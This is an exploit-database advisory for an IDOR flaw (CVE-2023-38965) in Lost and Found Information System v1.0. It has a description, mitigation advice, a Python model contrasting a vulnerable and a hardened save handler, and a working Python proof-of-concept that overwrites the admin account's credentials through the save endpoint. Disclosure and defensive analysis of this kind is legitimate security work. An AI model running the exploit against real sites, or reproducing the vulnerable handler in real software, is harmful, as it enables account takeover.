Vendor: Lost and Found Information System
By: OR4NG.M4N
CVSS: 8.1 (CRITICAL)
Vulnerability type: Insecure Direct Object Reference (IDOR)
CWE: 862
Product Name: Lost and Found Information System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CVE: CVE-2023-38965
CPE: a:lost_and_found_information_system:lost_and_found_information_system:1.0
Metasploit:
Other Scripts:
Platforms Tested: Web
Year: 2023

Lost and Found Information System v1.0 – Insecure Direct Object Reference leads to Account Takeover

The exploit allows an attacker to perform an Account Takeover by manipulating the 'id' parameter of a request to the 'classes/Users.php?f=save' endpoint in Lost and Found Information System v1.0. The handler uses the submitted 'id' to select which account record to update without checking that the caller is authorized for that record, so by changing the 'id' parameter an attacker can overwrite the credentials of other user accounts. This vulnerability has been assigned CVE-2023-38965.

Mitigation:

To mitigate this vulnerability, developers should implement proper access controls and validation on the save endpoint so that a request cannot modify accounts the caller does not own. The identity of the acting user should be taken from the authenticated session (a session token or other server-side identifier), and the server should verify that this user is allowed to modify the requested record before writing, rather than relying solely on the object reference supplied by the client.
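The check the mitigation describes, as an added example that is not the project's PHP code: a minimal Python model of the save handler, first as it behaves when it trusts the posted 'id', then with authorization derived from the server-side session. The session key 'user_id', the 'type' field, ADMIN_TYPE = 1 and the sample users are assumptions.

```python
import hashlib
import os
from dataclasses import dataclass

ADMIN_TYPE = 1  # assumed: account 'type' value that marks an administrator


@dataclass
class User:
    id: int
    username: str
    pw_hash: bytes = b""
    type: int = 2  # assumed: 2 = ordinary user

def make_store() -> dict:
    """Constructed sample data: one admin (id 1) and one ordinary user (id 2)."""
    return {1: User(1, "admin", type=ADMIN_TYPE), 2: User(2, "bob")}

def hash_password(pw: str) -> bytes:
    salt = os.urandom(16)
    return salt + hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, 200_000)

def save_user_vulnerable(session: dict, form: dict, store: dict) -> str:
    """Mirrors the flaw: the row to update is chosen by the client's 'id'."""
    target = int(form.get("id", 0))
    if target not in store:
        return "0"
    store[target].username = form["username"]
    store[target].pw_hash = hash_password(form["password"])
    return "1"  # success marker the public PoC checks for

def save_user_hardened(session: dict, form: dict, store: dict) -> str:
    """Authorize against the server-side session, not the request body."""
    if "user_id" not in session:
        return "401"  # not logged in: refuse before touching anything
    actor = store[session["user_id"]]
    try:
        target = int(form.get("id", actor.id))
    except ValueError:
        return "400"
    # Ordinary users may only edit the account bound to their own session;
    # naming another id is an admin-only action. Decide before any write.
    if target != actor.id and actor.type != ADMIN_TYPE:
        return "403"
    if target not in store:
        return "404"
    store[target].username = form["username"]
    store[target].pw_hash = hash_password(form["password"])
    return "1"
```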

Exploit-DB raw data:

# Exploit Title: Lost and Found Information System v1.0 - IDOR leads to Account Takeover
# Date: 2023-12-03
# Exploit Author: OR4NG.M4N
# Category : webapps
# CVE : CVE-2023-38965

Python PoC:

import argparse
import time

import requests

parser = argparse.ArgumentParser(description='Send a POST request to the target server')
parser.add_argument('-url', help='URL of the target', required=True)
parser.add_argument('-user', help='Username', required=True)
parser.add_argument('-password', help='Password', required=True)
args = parser.parse_args()

# The save handler; it does not verify that the caller owns the record named by 'id'
url = args.url + '/classes/Users.php?f=save'

# Form fields accepted by the handler; 'id' selects the account row that gets overwritten
data = {
    'id': '1',
    'firstname': 'or4ng',
    'middlename': '',
    'lastname': 'Admin',
    'username': args.user,
    'password': args.password
}

response = requests.post(url, data=data, timeout=10)
# The endpoint answers "1" when the save succeeded
if b"1" in response.content:
    print("Exploit ..")
    time.sleep(1)
    print("User :" + args.user + "\nPassword :" + args.password)
else:
    print("Exploit Failed..")